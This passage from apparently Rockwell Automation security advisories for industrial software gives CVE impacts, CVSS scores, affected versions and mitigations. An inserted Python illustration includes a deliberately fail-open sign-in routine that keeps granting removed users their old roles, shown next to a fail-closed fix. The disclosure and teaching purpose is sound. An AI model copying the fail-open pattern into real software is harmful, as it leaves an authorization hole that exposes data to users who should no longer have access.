CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-416: Use After Free

Known Exploited Vulnerability (KEV) database: No

CVE-2024-11156 IMPACT

An “out of bounds write” code execution security issue exists in the affected products. A crafted DOE file could cause the software to write beyond the boundaries of allocated memory, which a threat actor could use to execute arbitrary code. A legitimate user must open the malicious file crafted by the threat actor for this to be exploited.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-787: Out-of-bounds Write
Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-11158 IMPACT

An “uninitialized variable” code execution security issue exists in the affected products. A threat actor could craft a DOE file that forces the software to access a variable before it has been initialized, and use this to execute arbitrary code. A legitimate user must open the malicious file crafted by the threat actor for this to be exploited.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-665: Improper Initialization

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-12130 IMPACT

An “out of bounds read” code execution security issue exists in the affected products. A threat actor could craft a DOE file that forces the software to read beyond the boundaries of allocated memory, and use this to execute arbitrary code. A legitimate user must open the malicious file crafted by the threat actor for this to be exploited.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-125: Out-of-bounds Read

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-11157 IMPACT

A third-party security issue exists in the affected products. A crafted DOE file could cause the software to write beyond the boundaries of allocated memory, which a threat actor could leverage to execute arbitrary code. A legitimate user must open the malicious file crafted by the threat actor for this to be exploited.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-787: Out-of-bounds Write
Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-12672 IMPACT

A third-party security issue exists in the affected products. A crafted DOE file could cause the software to write beyond the boundaries of allocated memory, which a threat actor could leverage to execute arbitrary code. A legitimate user must open the malicious file crafted by the threat actor for this to be exploited.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-1395: Dependency on Vulnerable Third-Party Component

Known Exploited Vulnerability (KEV) database: No 

 

CVE-2024-11364 IMPACT

Another “uninitialized variable” code execution security issue exists in the affected products. A threat actor could craft a DOE file that forces the software to access a variable before it has been initialized, and leverage this to execute arbitrary code. A legitimate user must open the malicious file crafted by the threat actor for this to be exploited.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-1395: Dependency on Vulnerable Third-Party Component

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-12175 IMPACT

Another “use after free” code execution security issue exists in the affected products. A threat actor could craft a DOE file that forces the software to use a resource that has already been freed, and leverage this to execute arbitrary code. A legitimate user must open the malicious file crafted by the threat actor for this to be exploited.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-416: Use After Free

Known Exploited Vulnerability (KEV) database: No

 

Mitigations and Workarounds
Customers using the affected software should use the risk mitigations.

  •       Do not load untrusted Arena® model files.
  •       Hold the control key down when loading files to help prevent the VBA file stream from loading.

For information on how to mitigate Security Risks, use our suggested security best practices.

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories

Glossary

DOE file: Arena® model file that stores model data using the Microsoft Compound File format, which acts as a container for several data streams

Out of bounds read vulnerability: when a program reads data from a memory location outside the bounds of an array or buffer

Out of bounds write code vulnerability: a software vulnerability where a program writes beyond the bounds of an allowed area of memory

Third-party vulnerability: a weakness or flaw in an external vendor, supplier, or service provider’s system, process, or software that can be exploited to compromise the security of a connected organization.

Uninitialized variable vulnerability: occurs when a program accesses a variable before it has been initialized

Use-After-Free (UAF) vulnerability: a type of memory corruption vulnerability that occurs when a program continues to access memory locations that have already been freed.

High
SD1712 | Third Party Remote Code Execution Vulnerability in Verve Reporting
Published Date:
November 14, 2024
Last Updated:
November 14, 2024
CVE IDs:
CVE-2024-37287
CVSS Scores (v3.1):
7.2
CVSS Scores (v4.0):
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Published Date: 11/14/24

Last updated: 11/14/24

Revision Number: 1.0

CVSS Score: v3.1: 7.2/10, v4.0: 8.6/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product Affected Version(s) Corrected in Software Revision
Verve Reporting <v1.39 V1.39

VULNERABILITY DETAILS 

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. 

CVE-2024-37287 IMPACT

Verve Reporting uses Kibana, which contains a remote code execution vulnerability: an attacker with access to the ML and Alerting connector features, as well as write access to internal ML indices, can trigger a prototype pollution vulnerability that can ultimately lead to arbitrary code execution. Code execution is limited to the container.

CVSS Base Score v3.1: 7.2/10

CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score v4.0: 8.6/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-1395: Dependency on Vulnerable Third-Party Component

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Mitigations and Workarounds 

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability. 

  1. Restrict Access to Built-in Verve Account
    • Access to the built-in "verve" account should be limited to only administrators who need to perform administrative functions and should only be used for administrative purposes. Separate accounts should be used for day-to-day functions.
    • Change the password for the built-in "verve" account if it has been shared.
  2. Restrict Privileges for Other Accounts
    • Verve Reporting comes with built-in roles to simplify the delegation of user permissions. Assigning a user the following two roles will allow them access to most Verve Reporting features (excluding user administration), but will not give them the permissions needed to exploit this vulnerability.
      • all-all
      • feature-all-all
  3. Disable Machine Learning
    • Machine learning can be disabled in the Elasticsearch configuration override. Contact Verve support for assistance if needed.
      1. Connect to the Reporting server via SSH or terminal.
      2. Copy the Elasticsearch configuration override to the working directory:
         docker exec $(docker ps --filter "name=Reporting_elasticsearch" --format "{{ .ID }}") cat /usr/share/elasticsearch/config-templates/elasticsearch.override.yml > elasticsearch.override.yml
      3. Add the following line and save:
         xpack.ml.enabled: false
      4. Disable Verve Reporting from the Verve Software Manager.
      5. Update the Elasticsearch configuration override:
         docker config rm elasticsearchymloverride
         docker config create elasticsearchymloverride ./elasticsearch.override.yml
      6. Enable Verve Reporting from the Verve Software Manager and confirm that the application starts and "Machine Learning" is no longer listed in the main navigation bar under Analytics.
      7. Delete the copy of the Elasticsearch configuration override:
         rm elasticsearch.override.yml
  • Security Best Practices

 

High
SD1711 | Input Validation Vulnerability exists in Arena® Input Analyzer
Published Date:
November 14, 2024
Last Updated:
November 13, 2024
CVE IDs:
CVE-2024-6068
Products:
Arena® Input Analyzer
CVSS Scores (v3.1):
7.3
CVSS Scores (v4.0):
7.0
Revision Number:
1.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 11/14/2024

Revision Number: 1.0

CVSS Score: 3.1: 7.3/10, 4.0: 7.0/10

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Version | Corrected in Software Version
Arena® Input Analyzer | 16.20.03 and prior | 16.20.04

VULNERABILITY DETAILS

This vulnerability was reported to Rockwell Automation by Michael Heinzl. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerability.

CVE-2024-6068 IMPACT

A memory corruption vulnerability exists in the affected products when parsing DFT files.  Local threat actors can exploit this issue to disclose information and to execute arbitrary code. To exploit this vulnerability a legitimate user must open a malicious DFT file.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector:  CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector:  CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-1284: Improper Validation of Specified Quantity in Input
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·       For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

High
SD1709 | FactoryTalk View ME Remote Code Execution Vulnerability via Project Save Path
Published Date:
November 12, 2024
Last Updated:
November 12, 2024
CVE IDs:
CVE-2024-37365
Products:
FactoryTalk View Machine Edition
CVSS Scores (v3.1):
7.3
CVSS Scores (v4.0):
7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Published Date: November 12th, 2024

Last updated: November 12th, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.3/10, v4.0: 7.0/10

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve our customer’s business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Revision | Corrected in Software Revision
FactoryTalk View ME | >= V14; when using default folder privileges | V15

 

Mitigations and Workarounds

Customers using the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

·         To enhance security and prevent unauthorized modifications to HMI project files, harden the Windows OS by removing the INTERACTIVE group from the project folder's security properties.

·         Add specific users or user groups and assign their permissions to this folder using the least-privilege principle. Users with read-only permission can still test run and run the FactoryTalk View ME Station.

·         Guidance can be found in the FactoryTalk View ME v14 Help topic “HMI projects folder settings”. It can be opened through the FactoryTalk View ME Studio menu “Help\Contents\FactoryTalk View ME Help\Create a Machine Edition application->Open applications->HMI project folder settings”.

·         Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-37365 IMPACT

A remote code execution vulnerability exists in the affected product. The vulnerability allows users to save projects within the public directory allowing anyone with local access to modify and/or delete files. Additionally, a malicious user could potentially leverage this vulnerability to escalate their privileges by changing the macro to execute arbitrary code.

CVSS 3.1 Base Score: 7.3/10 

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0/10

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-20: Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

 ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

Critical
SD1710 | FactoryTalk® Updater Multiple Vulnerabilities
Published Date:
November 12, 2024
Last Updated:
November 12, 2024
CVE IDs:
CVE-2024-10943, CVE-2024-10944, CVE-2024-10945
Products:
FactoryTalk Updater
CVSS Scores (v3.1):
9.1, 8.4, 7.3
CVSS Scores (v4.0):
9.1, 7.1, 7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Published Date: 11/12/2024
Last Updated: 11/12/2024
Revision Number: 1.0
CVSS Score: Multiple, see below

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | First Known in Software Version | Corrected in Software Version
FactoryTalk® Updater – Web Client | CVE-2024-10943 | v4.00.00 | v4.20.00
FactoryTalk® Updater – Client | CVE-2024-10944 | All versions | V4.20.00
FactoryTalk® Updater – Agent | CVE-2024-10945 | All versions | V4.20.00

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-10943 IMPACT

An authentication bypass vulnerability exists in the affected product. The vulnerability exists due to shared secrets across accounts and could allow a threat actor to impersonate a user if the threat actor is able to enumerate additional information required during authentication.

CVSS 3.1 Base Score: 9.1
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVSS 4.0 Base Score: 9.1
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

CWE:  CWE-922: Insecure Storage of Sensitive Information
Known Exploited Vulnerability (KEV) database: No

CVE-2024-10944 IMPACT

A Remote Code Execution vulnerability exists in the affected product. The vulnerability requires a high level of permissions and exists due to improper input validation, which could allow a malicious Updater Agent to be deployed.

CVSS 3.1 Base Score: 8.4
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.1
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

CWE:  CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         Control access to the server where FactoryTalk® Updater is running.

·         Click the ‘Scan’ button, which will update the database

CVE-2024-10945 IMPACT

A Local Privilege Escalation vulnerability exists in the affected product. The vulnerability requires a local, low privileged threat actor to replace certain files during update and exists due to a failure to perform proper security checks before installation.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-358: Improperly Implemented Security Check for Standard
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Critical
SD1708 | ThinManager® Multiple Vulnerabilities
Published Date:
October 25, 2024
Last Updated:
October 25, 2024
CVE IDs:
CVE-2024-10386, CVE-2024-10387
Products:
FactoryTalk ThinManager
CVSS Scores (v3.1):
9.8, 7.5
CVSS Scores (v4.0):
9.3, 8.7
Revision Number:
1
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Published Date: 10/25/2024 
Last Updated: 10/25/2024 
Revision Number: 1.0 
CVSS Score: Multiple, see below

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Version(s) | Corrected Version(s)
ThinManager® | 11.2.0-11.2.9 | 11.2.10
ThinManager® | 12.0.0-12.0.7 | 12.0.8
ThinManager® | 12.1.0-12.1.8 | 12.1.9
ThinManager® | 13.0.0-13.0.5 | 13.0.6
ThinManager® | 13.1.0-13.1.3 | 13.1.4
ThinManager® | 13.2.0-13.2.2 | 13.2.3
ThinManager® | 14.0.0 | 14.0.1

Available here: ThinManager Downloads | ThinManager ®

 

VULNERABILITY DETAILS

The security of our products is important to us as your chosen industrial automation supplier. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. These vulnerabilities were discovered and reported to Rockwell Automation by security researchers at Tenable Network Security.

CVE-2024-10386 IMPACT

An authentication vulnerability exists in the affected product. The vulnerability could allow a threat actor with network access to send crafted messages to the device, potentially resulting in database manipulation.

CVSS 3.1 Base Score: 9.8 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-306: Missing Authentication for Critical Function 
Known Exploited Vulnerability (KEV) database: No

CVE-2024-10387 IMPACT

A Denial-of-Service vulnerability exists in the affected product. The vulnerability could allow a threat actor with network access to send crafted messages to the device, potentially resulting in Denial-of-Service.

CVSS 3.1 Base Score: 7.5 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-125: Out-of-bounds Read 
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply these risk mitigations, if possible.

  • If able, navigate to the ThinManager® download site and upgrade to a corrected version of ThinManager®.

  • Implement network hardening for the ThinManager® server by restricting TCP 2031 so that only the devices that require a connection to ThinManager® can reach it.

  • For information on how to mitigate security risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High
SD1707 | ControlLogix Vulnerable to Denial of Service via CIP Messages
Published Date:
October 10, 2024
Last Updated:
October 10, 2024
CVE IDs:
CVE-2024-6207
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Revision Number:
1.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: October 10, 2024 
Last updated: October 10, 2024
Revision Number: 1.0
CVSS Score: v3.1: 7.5, v4.0: 8.7 
 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
ControlLogix® 5580 | V28.011 | V33.017, V34.014, V35.013, V36.011 and later
ControlLogix® 5580 Process | V33.011 | V33.017, V34.014, V35.013, V36.011 and later
GuardLogix 5580 | V31.011 | V33.017, V34.014, V35.013, V36.011 and later
CompactLogix 5380 | V28.011 | V33.017, V34.014, V35.013, V36.011 and later
Compact GuardLogix 5380 SIL 2 | V31.011 | V33.017, V34.014, V35.013, V36.011 and later
Compact GuardLogix 5380 SIL 3 | V32.013 | V33.017, V34.014, V35.013, V36.011 and later
CompactLogix 5480 | V32.011 | V33.017, V34.014, V35.013, V36.011 and later
FactoryTalk® Logix Echo | V33.011 | V34.014, V35.013, V36.011 and later

 

VULNERABILITY DETAILS

Rockwell Automation used versions 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerability, which was reported to Rockwell Automation by Trevor Flynn.

CVE-2024-6207 IMPACT

A denial-of-service vulnerability exists in the affected products: an invalid CIP request causes the controller to enter a major nonrecoverable fault (MNRF). To exploit this vulnerability, a threat actor must chain it with CVE-2021-22681 and send a specially crafted CIP message to the device. If exploited, a threat actor could prevent legitimate users from accessing the controller and end its connections to connected devices, including the workstation. Recovering the controller requires a download, which ends any process the controller is running.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

Mitigations and Workarounds

Customers running affected firmware are encouraged to upgrade to one of the corrected revisions listed above. We also encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

  • Security Best Practices

ADDITIONAL RESOURCES

  • JSON CVE-2024-6207

High
SD1705 | PowerFlex 6000T CIP Security Denial-of-Service Vulnerability
Published Date:
October 07, 2024
Last Updated:
October 07, 2024
CVE IDs:
CVE-2024-9124
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 10/8/2024
Last Updated: 10/8/2024
Revision Number: 1.0
CVSS Score: v3.1: 7.5/10, v4.0: 8.2/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Version | Corrected in Software Version
Drives - PowerFlex 6000T | 8.001, 8.002, 9.001 | 10.001

 

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-9124 IMPACT

A denial-of-service vulnerability exists in the PowerFlex® 6000T. If the device is overloaded with requests, it will become unavailable. The device may require a power cycle to recover it if it does not re-establish a connection after it stops receiving requests. 

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.2
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-754: Improper Check for Unusual or Exceptional Conditions
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.    

  • Security Best Practices 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • CVE-2024-9124 JSON

High
SD1706 | Logix Controllers Vulnerable to Denial-of-Service Vulnerability
Published Date:
October 07, 2024
Last Updated:
October 10, 2024
CVE IDs:
CVE-2024-8626
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Revision Number:
2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Logix Controllers Vulnerable to Denial-of-Service Vulnerability

Published Date: October 8, 2024
Last Updated: October 10, 2024
Revision Number: 2.0
CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
CompactLogix 5380 controllers | v33.011 | v33.015 and later (for v33); v34.011 and later
Compact GuardLogix® 5380 controllers | v33.011 | v33.015 and later (for v33); v34.011 and later
CompactLogix 5480 controllers | v33.011 | v33.015 and later (for v33); v34.011 and later
ControlLogix 5580 controllers | v33.011 | v33.015 and later (for v33); v34.011 and later
GuardLogix 5580 controllers | v33.011 | v33.015 and later (for v33); v34.011 and later
1756-EN4TR | v3.002 | 4.001 and later

Mitigations and Workarounds 

Customers using the affected versions are encouraged to upgrade to corrected firmware versions. We also strongly encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability. 

  • Security Best Practices

VULNERABILITY DETAILS

CVE-2024-8626 IMPACT

Due to a memory leak, a denial-of-service vulnerability exists in the affected products. A malicious actor could exploit this vulnerability by performing multiple actions on certain web pages of the product causing the affected products to become fully unavailable and require a power cycle to recover. 

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVSS 3.1 Base Score: 7.5 (high)
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7 (high)
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-400: Uncontrolled Resource Consumption

ADDITIONAL RESOURCES

  • JSON CVE-2024-8626

Medium
SD1704 | Improper Authorization Vulnerability in Verve® Asset Manager
Published Date:
October 04, 2024
Last Updated:
October 04, 2024
CVE IDs:
CVE-2024-9412
CVSS Scores (v3.1):
6.8
CVSS Scores (v4.0):
8.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 10/8/24
Last Updated: 10/8/24
Revision Number: 1.0
CVSS Score: v3.1: 6.8, v4.0: 8.4

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in Software Version
Verve® Asset Manager | All versions < 1.38 | V1.38

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-9412 IMPACT

An improper authorization vulnerability exists in the affected products that could allow an unauthorized user to sign in. The condition arises only when every role mapping has been removed; while that is unlikely, it could happen through unexpected or accidental removal by an administrator. If exploited, a previously mapped user could access data they used to have, but should no longer have, access to.

 

CVSS 3.1 Base Score: 6.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.4
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-842: Placement of User into Incorrect Group
Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

Mitigations and Workarounds 

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.  

  • The presence of any mappings will help prevent this vulnerability from being exploited. If all mappings must be removed, manually removing previously mapped users is an effective workaround.

  • Security Best Practices
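An added illustration, not Verve's code (Rockwell does not publish the failing logic): the situation the advisory describes, a sign-in that still succeeds for a previously mapped user once every role mapping has been removed, modelled as an authorization routine that treats an empty mapping table as "not configured" and falls back to roles retained from an earlier sign-in. The `User` model, its `cached_roles` field and the group and role names are this example's assumptions. The fail-closed variant beside it is the shape a fix should take, and `revoke_cached_roles` mirrors the advisory's workaround of manually removing previously mapped users.

```python
from dataclasses import dataclass

# Constructed model (not Verve's implementation): an identity provider supplies the groups a user
# belongs to, and the product keeps a table mapping those groups to application roles. Sign-in is
# granted only when the user resolves to at least one role.


@dataclass
class User:
    name: str
    groups: frozenset
    cached_roles: frozenset = frozenset()   # roles retained from an earlier successful sign-in (assumed)


def resolve_roles(user: User, role_mappings: dict) -> frozenset:
    """Effective roles: the union of the roles mapped to each group the user belongs to."""
    roles = set()
    for group in user.groups:
        roles.update(role_mappings.get(group, ()))
    return frozenset(roles)


def sign_in_fail_open(user: User, role_mappings: dict) -> frozenset:
    """Vulnerable pattern: an empty mapping table is treated as 'not configured' and the code falls
    back to the roles retained from the user's last sign-in, so a user whose mapping was removed
    keeps the access they used to have. Returns the roles granted; an empty set means denied."""
    if not role_mappings:                    # BUG: no mappings should mean nobody signs in
        return user.cached_roles
    roles = resolve_roles(user, role_mappings)
    user.cached_roles = roles                # retained for next time; this is what the bug leaks
    return roles


def sign_in_fail_closed(user: User, role_mappings: dict) -> frozenset:
    """Hardened: roles come only from the current mapping table. No mapping, no role, no sign-in."""
    return resolve_roles(user, role_mappings)


def revoke_cached_roles(user: User) -> None:
    """Counterpart of the advisory's workaround: remove the previously mapped user's retained access."""
    user.cached_roles = frozenset()


def demonstrate():
    """Walk through the advisory's scenario; returns (roles before removal, fail-open after, fail-closed after)."""
    mappings = {"ot-engineers": {"viewer", "editor"}}    # constructed group and role names
    alice = User("alice", frozenset({"ot-engineers"}))
    before = sign_in_fail_open(alice, mappings)           # normal sign-in; roles get retained
    mappings.clear()                                      # administrator removes the last mapping
    return before, sign_in_fail_open(alice, mappings), sign_in_fail_closed(alice, mappings)


if __name__ == "__main__":
    before, fail_open, fail_closed = demonstrate()
    print("roles before removal:", sorted(before))
    print("after removing all mappings, fail-open grants:", sorted(fail_open))
    print("after removing all mappings, fail-closed grants:", sorted(fail_closed))
```

The point to take from the two variants is the default: an authorization check should produce "no roles" when its policy source is empty, never fall through to whatever it remembered last, and any retained state should be cleared when the mapping that justified it goes away.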

 

ADDITIONAL RESOURCES

  • JSON CVE-2024-9412

 

Critical
SD1703 | DataMosaix™ Private Cloud third-party Vulnerabilities
Published Date:
October 04, 2024
Last Updated:
October 04, 2024
CVE IDs:
